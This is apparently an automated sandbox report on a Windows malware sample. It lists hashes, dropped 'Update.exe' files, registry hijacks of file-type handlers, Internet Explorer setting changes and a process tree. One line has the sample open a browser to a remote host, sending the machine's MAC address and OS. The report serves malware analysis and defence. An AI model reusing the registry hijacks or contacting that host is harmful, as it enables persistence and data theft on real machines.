Analysis
-
max time kernel
144s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
03/10/2022, 06:47
Behavioral task
behavioral1
Sample
c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe
Resource
win10v2004-20220812-en
General
-
Target
c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe
-
Size
55KB
-
MD5
6214ac19576dc2c193b5c8b4808a25a1
-
SHA1
4dfe06481de5046215a9989c1089ac81727bf530
-
SHA256
c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15
-
SHA512
a0a7a59573d8a8ce1b120e2dae55917df802814d885357409211abc133a403a34bae1248f801ebb2fb72d20f7ba56a0ef88e1d4796f4fea601e5b9e5d0910414
-
SSDEEP
1536:qaREAVLhLiM/xhfMLzaLa6hIAsdxn6sM0TZMl9Ve:BvLJTphfKp6hIAsdxn6sM0TZMl9Ve
Malware Config
Signatures
-
resource yara_rule behavioral1/memory/2000-54-0x0000000000400000-0x0000000000426000-memory.dmp upx behavioral1/memory/2000-56-0x0000000000400000-0x0000000000426000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Thunder\Update.exe c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe File opened for modification C:\Program Files\Thunder\Update.exe c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\WINDOWS\Downloaded Program Files\Update.exe c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "371671659" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBarLayout = 110000005c00000000000000340000001f0000006e00000001000000a0060000a00f000005000000220400002600000002000000a1060000a00f000004000000a10000000f02000003000000a10200003b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 40da54fe1bd8d801 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FE7A9230-440E-11ED-85E0-FE41811C61F5} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000062e6ef0d45f4454ab79548c962d74cdf00000000020000000000106600000001000020000000bfe60fb7536af9a539a13fc60ca3fe87888943ffebcf74d46a8d344971855713000000000e8000000002000020000000be0c2b3800b5adf5680d86a68dcbca5881ef5dcfc40bf08d85d4cffa062ff7ca90000000afd546539a6ce2207152ac24418f236a93972306346d4f684fbd9c6f646917b500759ce4043d704da8a85509a5f379692fa6d8cb28c3b811156c63179b5a802fbd8d784d0fed7355ef88568546a4e4a397b7e435ff9b0fd5087ebb9fc0ba3f6fbbff137772863df37217ee801d7e4c9985a63a1aaa77ab580a6cb27273a436b9391e1d8e12bd17485bf2bf2f3c97675b40000000797e8cfdd8aac4eb86a3fed76a97d47669c0dd57b86ea39c6c61fdc8cc6f5ee9f1cce1d00a253327e7f89fdd12baa829cc7430dfc788c7f49cd2bacba2c62e7e iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000062e6ef0d45f4454ab79548c962d74cdf000000000200000000001066000000010000200000008da300fad3d79d5d4fa2b8d69b2f5bd218ef7ce6b17af10fbaee651c0ab67a3e000000000e80000000020000200000003bc6ca28379a7ae9a5512b81f050067660bf0be11f83db3fad14a94f9d41880a200000009d6f34ee3b08498100a6b3b53102c0d170cf3c813ae1ad78278021f41c2d3e4140000000380a0dd3f3a5a8119b484f16bcced9b6c70a95508151d79d16b796d2a7dbfb4de9df7ecd0b205688ab17211d5374c51a80db70136a1e5b655f29fcfabef16071 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Frist c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Layout = 130000000000000000000000300000001400000016000000010000000007000080010000030000000103000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\ScriptEngine c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\ScriptEngine\ = "JScript.Encode" c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\ScriptEngine c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open\command c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\DefaultIcon\ = "C:\\WINDOWS\\Downloaded Program Files\\game.ico" c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open\command\ = "C:\\Program Files\\Thunder\\Update.exe \"%1\" %*" c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\ScriptEngine\ = "JScript.Encode" c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\DefaultIcon\ = "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2028 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2028 iexplore.exe 2028 iexplore.exe 1564 IEXPLORE.EXE 1564 IEXPLORE.EXE 1564 IEXPLORE.EXE 1564 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2000 wrote to memory of 2028 2000 c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe 27 PID 2000 wrote to memory of 2028 2000 c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe 27 PID 2000 wrote to memory of 2028 2000 c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe 27 PID 2000 wrote to memory of 2028 2000 c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe 27 PID 2028 wrote to memory of 1564 2028 iexplore.exe 30 PID 2028 wrote to memory of 1564 2028 iexplore.exe 30 PID 2028 wrote to memory of 1564 2028 iexplore.exe 30 PID 2028 wrote to memory of 1564 2028 iexplore.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe"C:\Users\Admin\AppData\Local\Temp\c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a15.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=fe-41-81-1c-61-f5&os=Microsoft Windows XP&flag=659f6252b80304b314258e8cbef28608&user=c5f1fc432491b39fe5b75b55b414537440798e956b0724a772cbbdf9d1c27a152⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2028 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1564
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
608B
MD58634d0a867168375b796331433d0186b
SHA1ecaa0627f0448dc38f64de63489e3b32e09836e3
SHA256b7f282cd815a3d2fb4f76985ab992f830a1052bb463169ecb2ec6282303652fd
SHA51219607ccc9e516a4057131a3ec623bd84cc3b637a21f5d60d26fddd6b2f318f370daa6554475ceb9d29f7415fe9fc148303a1ab4c73a813197e22a84f54c07484